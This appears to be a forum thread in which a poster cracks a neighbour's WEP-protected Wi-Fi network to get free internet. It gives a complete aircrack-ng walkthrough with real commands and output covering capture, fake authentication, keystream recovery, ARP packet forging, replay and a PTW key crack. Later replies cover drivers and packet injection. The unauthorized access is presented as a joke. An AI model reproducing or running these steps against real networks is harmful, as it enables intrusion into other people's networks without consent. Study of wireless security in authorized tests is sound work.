i just moved from Texas to Northern VA and its been hell finding a place to rent. We finally found a place but the cable man didn't come till monday, now that wont do i need my EH.net fix. thankfully there are plenty of wifi networks i can see from inside the house...


######################
# Step 1: Target a specific network #
######################

root@segfault:/home/cg/eric-g# airodump-ng --bssid 00:18:F8:F4:CF:E4 -c 9 ath2 -w eric-g
CH 9 ][ Elapsed: 4 mins ][ 2007-11-21 23:08

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:F8:F4:CF:E4 21 21 2428 26251 0 9 48 WEP WEP OPN eric-G

BSSID STATION PWR Lost Packets Probes

00:18:F8:F4:CF:E4 06:19:7E:8E:72:87 23 0 34189

###########################
# Step 2: Associate with the target network #
###########################

root@segfault:/home/cg/eric-g# aireplay-ng -1 600 -e eric-G -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:53:23 Waiting for beacon frame (BSSID: 00:18:F8:F4:CF:E4)
22:53:23 Sending Authentication Request
22:53:23 Authentication successful
22:53:23 Sending Association Request
22:53:24 Association successful :-)
22:53:39 Sending keep-alive packet
22:53:54 Sending keep-alive packet
22:54:09 Sending keep-alive packet
22:54:24 Sending keep-alive packet
22:54:39 Sending keep-alive packet
22:54:54 Sending keep-alive packet
22:55:09 Sending keep-alive packet
22:55:24 Sending keep-alive packet
22:55:39 Sending keep-alive packet
22:55:54 Sending keep-alive packet
22:55:54 Got a deauthentication packet!
22:55:57 Sending Authentication Request
22:55:59 Sending Authentication Request
22:55:59 Authentication successful
22:55:59 Sending Association Request
22:55:59 Association successful :-)
22:56:14 Sending keep-alive packet

***KEEP THAT RUNNING

####################
# Step 3: Generate Key Stream #
####################

root@segfault:/home/cg/eric-g# aireplay-ng -5 -b 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:59:41 Waiting for a data packet...
Read 873 packets...

Size: 352, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:18:F8:F4:CF:E2

0x0000: 0842 0000 0100 5e7f fffa 0018 f8f4 cfe4 .B....^........
0x0010: 0018 f8f4 cfe2 c0b5 121a 4600 0e18 0f3d ..........F....=
0x0020: bd80 8c41 de34 0437 8d2d c97f 2447 3d81 ...A.4.7.-.$G=.
0x0030: 9bdc 68da 06b2 18be 9cd6 9cb4 9443 8725 ..h..........C.%
0x0040: 87f6 9a14 1ff9 0cfa bd36 862e ec54 7215 .........6...Tr.
0x0050: 335b 4a91 d6a4 caae 5a58 a736 6230 87d9 3[J.....ZX.6b0..
0x0060: 4e14 7617 21c6 eda4 9b0d 3a00 0b4f 47ab N.v.!.....:..OG.
0x0070: a529 dedf 4c13 880c a1e6 37f7 50e6 599c .)..L.....7.P.Y.
0x0080: 0a4c 0b7f 24ae b019 ef2f 36b9 c499 8643 .L.$..../6....C
0x0090: 6592 5835 23e5 c8e9 d1b9 3d36 1fe5 ecfe e.X5#.....=6....
0x00a0: 510b 51ba 4fe4 e2ed d33b 0459 ca68 82b8 Q.Q.O....;.Y.h..
0x00b0: c856 ea70 829f c753 1614 290e d051 392f .V.p...S..)..Q9/
0x00c0: fa65 cbc6 c5f8 24b1 cdbd 94e5 08c3 2dd4 .e....$.......-.
0x00d0: 6e4b 983b dc82 b2cd b3f1 dab5 b816 6188 nK.;..........a.
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-1121-230028.cap
23:00:38 Data packet found!
23:00:38 Sending fragmented packet
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 384 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 1500 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
Saving keystream in fragment-1121-230038.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

######################
# Step 4: Build a valid ARP Packet #
######################

root@segfault:/home/cg/eric-g# packetforge-ng -0 -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 -k 255.255.255.255 -l 255.255.255.255 -w arp -y *.xor
Wrote packet to: arp

#########################
# Step 5: Generate your own arp traffic #
#########################

root@segfault:/home/cg/eric-g# aireplay-ng -2 -r arp -x 150 ath2

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 06:19:7E:8E:72:87

0x0000: 0841 0201 0018 f8f4 cfe4 0619 7e8e 7287 .A..........~.r.
0x0010: ffff ffff ffff 8001 1f1a 4600 c9d3 e5e7 ..........F.....
0x0020: d65a 6a63 0b51 bb60 8390 a8b4 947d 456f .Zjc.Q.`.....}Eo
0x0030: 3a05 25b2 7464 7db7 c49b d38a f789 822c :.%.td}........,
0x0040: 83a8 93c5 ....

Use this packet ? y

Saving chosen packet in replay_src-1121-230224.cap
You should also start airodump-ng to capture replies. **we started airodump on step1

**at this point your airodump capture should really be filling up with a ton of data packets as we do the arp replay attack


################
# Step 6: Start cracking #
################

**we can run aircrack while the arp replay attack is ongoing, so you dont have to stop the arp replay or fake authentication sessions.

cg@segfault:~/eric-g$ aircrack-ng -z eric-g-05.cap
Opening eric-g-05.cap
Read 64282 packets.

# BSSID ESSID Encryption

1 00:18:F8:F4:CF:E4 eric-G WEP (21102 IVs)

Choosing first network as target.

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21397 ivs.

Aircrack-ng 0.9.1


[00:00:11] Tested 78120/140000 keys (got 22918 IVs)

KB depth byte(vote)
0 3/ 5 34( 111) 70( 109) 42( 107) 2C( 106) B9( 106) E3( 106)
1 1/ 14 34( 115) 92( 110) 35( 109) 53( 109) 33( 108) CD( 107)
2 6/ 18 91( 114) E7( 114) 21( 111) 0E( 110) 88( 109) C6( 109)
3 2/ 31 37( 109) 80( 109) 5F( 108) 92( 108) 9E( 108) 9B( 107)
4 0/ 2 29( 129) 55( 114) AD( 112) 6A( 111) BB( 110) C1( 110)

KEY FOUND! [ 70:34:91:37:29 ]
Decrypted correctly: 100%


Total time to crack, 4 minutes ;-)

lol yea and this was just an "Ethical" example of remote access.

Brian

cheers!

did that count as your last post?

did you go to the aircrack site and see if your wifi card was supported?

but yeah, you'll need a driver

Great post, so now I have two questions, do you really need to re-authenticate constantly, and more importantly, I did a wireless pen test for a company last week, they used wep , so I injected arp packets and ran aircrack-ng with -z, I was suprise to see that the attack did not succeed even with 1m IVs, I cracked it with the standard mode, but now I' wondering anyone have any idea why it failed?

for this purpose I have to set my wireless client to moniter mode!!so I need drivers for that!!my question is manufacturer supplied drivers will work or not if,i am in a limited account???

I use the madwifi drivers also, but also I use hostap drivers sometimes because some apps i like require these. Make sure the kernel  you are running works with the driver you want to use. I have seen guys trying to compile drivers over and over trying to get them to work to no avail only to discover the kernel they are running doesnt support the driver they are trying to use, so save yourself some time and frustration. The aircrack-ng site has good instructions on how to modify the drivers you need. A lot depends on what you are trying to do. Typically you need "hacked" drivers in order to inject packets and when cracking smaller networks, packet injection is a must unless you want to spend days collecting IVs. Packet injection requires more than just being in monitor mode. You might find you can put your card into monitor mode but it doesn't inject.  The aircrack-ng site really has a lot of good info on it and anyone serious about cracking wifi should read it completely. After that you can bring in other apps or write your own to augment what you are doing. At that point you have a good foundation. Once you have it down, cracking wifi can be the most enjoyable thing you can do. Its actually can be cool watching all the packets your collecting and the aircrack-ng suite makes it very visual as you watch 1000 of packets inject and collect until the key "pops" up. Actually its one of the few visual hacks that would be interesting enough for hollywood.